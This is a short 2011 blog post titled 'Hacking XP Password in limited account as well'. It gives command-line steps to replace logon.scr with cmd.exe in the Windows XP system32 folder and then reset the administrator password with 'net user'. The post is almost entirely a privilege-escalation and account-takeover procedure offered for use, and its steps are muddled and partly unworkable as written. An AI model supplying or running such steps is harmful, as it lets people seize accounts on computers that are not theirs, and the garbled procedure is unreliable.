Thursday, August 11, 2011

Hacking XP Password in limited account as well

This is the way to hack the Microsoft Windows XP administrator password provided that any account
i.e. any either administrator or limited account should be open.

go to run
type cmd this will open up the command prompt.
type cd.. this will take u to the root directory that is one step back to the current account

type net user
list of the accounts available on the pc will be shown.
now type
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack

copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe

del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

after this type net user username newpassword
and now u will b done .the new password will b the password forever for that pc.for eg. the username is "administrator" and the password u want to assign is "pp"then u type
net user administrator pp and press enter

Popular Posts